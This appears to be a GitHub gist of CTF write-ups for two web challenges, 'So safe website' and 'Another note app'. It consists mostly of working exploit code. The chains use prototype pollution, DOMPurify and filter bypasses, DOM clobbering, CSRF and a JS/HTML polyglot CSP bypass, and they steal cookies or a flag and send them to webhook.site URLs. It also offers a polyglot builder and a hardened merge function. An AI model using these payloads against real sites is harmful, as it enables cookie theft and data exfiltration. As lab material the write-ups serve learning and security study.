@parrot409
Last active April 24, 2021 17:43

So safe website

I was inspired to make this challenge while I was playing a challenge by @53c0nd-2473.

  1. Overwrite `Object.getOwnPropertyNames` through the "nice feature" (prototype pollution) to bypass DOMPurify + Trusted Types: {"name":{"__proto__":{"__proto__":{"constructor":{"getOwnPropertyNames":"B"}}}}}
  2. Bypass the custom filter with a noscript tag, for example: <noscript><img src="</noscript><img src=1 onerror=alert()">
  3. Steal the cookies with debug.js (DOM clobbering): set the parent's window.name to the cookies, then redirect with a meta refresh tag.
  4. Send window.name to your webhook.
```js
// Step 1: prototype pollution payload for the "nice feature" (the `wow` parameter).
// The two __proto__ hops walk name -> String.prototype -> Object.prototype, whose
// constructor is Object, so the last key replaces Object.getOwnPropertyNames with "B".
var ppPayload = `{"name":{"__proto__":{"__proto__":{"constructor":{"getOwnPropertyNames":"B"}}}}}`;

// Step 2: noscript trick against the custom filter. The filter sees one <img> whose
// id attribute swallows everything up to the final quote; a browser with scripting
// enabled treats the noscript body as raw text, closes it at the first </noscript>,
// and renders the iframe (HTMLINJ) and the meta refresh to the webhook.
var customFilterBypass = `
<noscript>
	<img/id="
	     </noscript><img><iframe/srcdoc='HTMLINJ'></iframe><meta/http-equiv='refresh'/content='1;url=https://webhook.site/6-b79f993da3a' />
	">
</noscript>`.replace(/\n/g,"").replace(/ /g,"").replace(/\t/g,"");

// Steps 3/4: DOM clobbering for debug.js. The outer iframe is named debugOptions,
// the one inside it "0", and the innermost document defines ids 0..3 whose attributes
// spell parent / name / document / cookie. Each srcdoc nesting level needs one more
// round of &quot; encoding, because every enclosing document decodes the attribute
// once. The stylesheet <link>s placed before debug.js hold its execution until they
// load (pending stylesheets block script execution), so the iframes exist first.
var domclobbering = `
<iframe srcdoc="NEXT" name="debugOptions"></iframe><link href="/ff" rel="stylesheet"><link href="/qqq" rel="stylesheet"><link href="/ffds" rel="stylesheet"><link href="/df" rel="stylesheet"><script src="/js/debug.js"></script>
`.replace(/"/g,"&quot;");
domclobbering = domclobbering.replace("NEXT",`
<iframe srcdoc="NEXT" name="0"></iframe>
`).replace(/"/g,"&amp;quot;")

domclobbering = domclobbering.replace("NEXT",`
<br id="0" clear="parent"><font id="1" face="name"><object id="2" code="document"></object><input id="3" accept="cookie">
`.replace(/"/g,"&amp;amp;quot;"));

// Spaces are swapped for "/" so no attribute separator is a literal space.
customFilterBypass = customFilterBypass.replace("HTMLINJ",domclobbering).replace(/\n/g,"").replace(/ /g,"/");

console.log(`http://sosafewebsite.peykar.io:7070/?name=${encodeURIComponent(customFilterBypass)}&wow=${encodeURIComponent(ppPayload)}`);
```
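How step 1 reaches `Object.getOwnPropertyNames`, as an added example that is not code from the gist or from the challenge: a recursive merge of the kind the "nice feature" presumably performs on the JSON from the `wow` parameter. The gist does not show the challenge code, so the `unsafeMerge` function and the `{ name: "guest" }` target are assumptions. The payload only works when `name` already holds a string, because that is what turns the two `__proto__` hops into `String.prototype` and then `Object.prototype`, whose `constructor` is `Object`. The hardened merge beside it refuses the keys that cross into the prototype chain and only recurses into own plain-object properties.

```javascript
// Added example, not code from the gist or the challenge. The payload is the
// gist's; the merge functions and the target object are assumptions.
const PP_PAYLOAD =
  '{"name":{"__proto__":{"__proto__":{"constructor":{"getOwnPropertyNames":"B"}}}}}';

// Vulnerable merge: recurses into whatever target[key] already resolves to.
// With target.name === "guest": "guest".__proto__ is String.prototype, its
// __proto__ is Object.prototype, .constructor is Object, so the last hop
// writes Object.getOwnPropertyNames = "B".
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === "object" && target[key] !== undefined) {
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened merge: skips the keys that leave the object, and only recurses
// into own properties that are themselves objects (never inherited ones).
const BLOCKED_KEYS = new Set(["__proto__", "constructor", "prototype"]);
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    const own = Object.prototype.hasOwnProperty.call(target, key) ? target[key] : undefined;
    if (value !== null && typeof value === "object" &&
        own !== null && typeof own === "object") {
      safeMerge(own, value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Runs one merge against a constructed target and reports what
// Object.getOwnPropertyNames is afterwards ("string" means polluted).
// The original function is restored so the rest of the runtime keeps working.
function pollutionResult(mergeFn) {
  const original = Object.getOwnPropertyNames;
  try {
    const state = { name: "guest" };          // constructed target; `name` is a string
    mergeFn(state, JSON.parse(PP_PAYLOAD));   // JSON.parse keeps "__proto__" as an own key
    return typeof Object.getOwnPropertyNames;
  } finally {
    Object.getOwnPropertyNames = original;
  }
}

console.log("unsafeMerge:", pollutionResult(unsafeMerge)); // string
console.log("safeMerge:  ", pollutionResult(safeMerge));   // function
```

Once `Object.getOwnPropertyNames` is a string, any library code that calls it throws, which is the condition the first step of the gist relies on; the check to run against a merge you are auditing is exactly `typeof Object.getOwnPropertyNames` after feeding it the payload.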

Another note app

  1. CSRF to add a note.
  2. Bypass CSP on the notes website by putting the script and the HTML in the same file (a JS/HTML polyglot note):
```html
alert();
`
<script src="/self">
</script>
`
```
  3. Make the main website same-origin with the note website by supplying document.domain=document.domain as the feature.
  4. Use the main origin's fetch to grab the flag. Exploit:
```html
<html>
	<head>
	</head>
	<body>
		<script>
			// The same page is opened several times; window.name tells each window its role.
			window.target = {domain : "139.162.238.54", main : "http://139.162.238.54:9090",webhook:"https://webhook.site/-b79b-8005f993da3a"};
			var status = window.name;
			var t = 8;
			
			// HTML half of the polyglot note: an iframe whose srcdoc loads the note itself as a script.
			function getIncludeScriptPayload(){
				let payload = document.createElement("iframe");
				payload.srcdoc =  `<script src=${target.main}/note><\/script>`;
				return payload.outerHTML;
			}

			// Second popup: CSRF the note endpoint. The note is the JS payload followed by the
			// HTML half inside a template literal, so it parses both as a script and as a page.
			if(status == "csrf_note_include_script"){
				var form = document.createElement("form");
				form.id = "csrfForm";
				form.method = "POST";
				form.action = target.main+"/note";
				var inp = document.createElement("input");
				// Runs inside the srcdoc iframe of the note page: relax document.domain, then use
				// the opener (the main site, already relaxed via the feature) to fetch the flag.
				var jspayload = `
					document.domain="${target.domain}";
					setTimeout(()=>{
						parent.parent.opener.fetch("/flag",{method:"POST",headers:{"x-i-want":"flag"}}).then(r=>r.text()).then(r=>{
							parent.parent.location="${target.webhook}?flag="+r;
						});
					},1000);
				`.replace(/\n/g,"").replace(/ /g,""); // chained: replace() takes one pattern per call
				inp.value = jspayload+";`"+getIncludeScriptPayload()+"`";
				inp.name = "note";
				form.appendChild(inp);
				document.body.appendChild(form);
				csrfForm.submit();
			}


			// First popup: open the CSRF popup (which keeps this window as its opener), then
			// navigate itself to the main site with the feature that runs document.domain=document.domain.
			if(status == "start_attack"){
				window.open("?","csrf_note_include_script");
				document.location = `${target.main}?feature=document.domain=document.domain`
			}

			function startattack(){
				window.open("?","start_attack");
			}

			// Initial visit: window.name is empty (or numeric from a previous frame), so start.
			if(status == "" || !isNaN(status)){
				startattack();
			}
		</script>
		<button onclick="startattack()">Attack</button>
	</body>
</html>
```
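The note contents that make the CSP bypass work, as an added example that is not code from the gist: a builder for the JS/HTML polyglot and a syntax check that the result still compiles as a script, which is the half that is easy to break. `noteUrl` and the payload string are caller-supplied placeholders (the gist uses `http://139.162.238.54:9090/note`); the HTML half is the same `<iframe srcdoc>` wrapper the exploit above uses. The page reading additionally requires the note app to echo the note unescaped, which the gist's solution relies on but this check cannot verify.

```javascript
// Added example, not code from the gist. Builds the polyglot note from the
// "Another note app" solution and checks that it parses as JavaScript.
// noteUrl and jsPayload are placeholders chosen by the caller.

function buildPolyglotNote(jsPayload, noteUrl) {
  // HTML half: an iframe whose srcdoc loads the note itself as a script.
  // "<\/script>" keeps this template literal from being closed by the HTML.
  const html = `<iframe srcdoc="<script src=${noteUrl}><\/script>"></iframe>`;
  // The HTML half sits inside a JS template literal, so a backtick or "${"
  // in it would end the literal (or evaluate) and break the script reading.
  if (/`|\$\{/.test(html)) {
    throw new Error("noteUrl would terminate the template literal");
  }
  // ";" ends the payload; the literal is an unused expression statement, so
  // as a script the HTML half does nothing. As a page, the JS half is plain
  // text and the iframe renders.
  return `${jsPayload};\`${html}\``;
}

// Compiles the note as a function body without running it. True means the
// polyglot is valid as a script; anything other than a SyntaxError is rethrown.
function parsesAsScript(note) {
  try {
    new Function(note);
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

const note = buildPolyglotNote('document.domain="139.162.238.54"', "http://139.162.238.54:9090/note");
console.log(note);
console.log("parses as script:", parsesAsScript(note)); // true
```

Run the check before submitting a note: a payload that compiles locally will also compile when the iframe pulls it back through `<script src>`, and a rejected `noteUrl` points at the template-literal boundary rather than at a confusing failure in the victim's browser.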